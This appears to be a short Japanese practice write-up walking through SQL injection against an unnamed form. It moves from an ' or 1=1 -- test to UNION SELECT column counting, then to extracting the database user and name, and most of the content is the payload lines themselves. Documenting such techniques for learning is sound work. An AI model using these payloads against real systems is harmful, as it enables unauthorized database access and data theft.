Hello there, ('ω')ノ
こんなインジェクションもやっていなかったものかと。
まずは、正常動作確認を。
もうひとつ。
下記のいつものパターンを入力すると脆弱性があることがわかったので。
' or 1=1 --
もう少し情報収集をしたいので、とりあえず下記のコードを入力すると。
Syntaxエラーがでたので。
' union select 1,2,3,4,5 --
最後のコメントアウトのところを別のコードに変更してみると。
どうやら機能したみたいで。
ただ、カラム数がちがうとのことで。
' union select 1,2,3,4,5 #
試行錯誤した結果、カラム数は7個らしく。
' union select 1,2,3,4,5,6,7 #
表示されたカラムの箇所をつかって情報取集を。
' union select 1,user(),database(),4,5,6,7 #
Best regards, (^^ゞ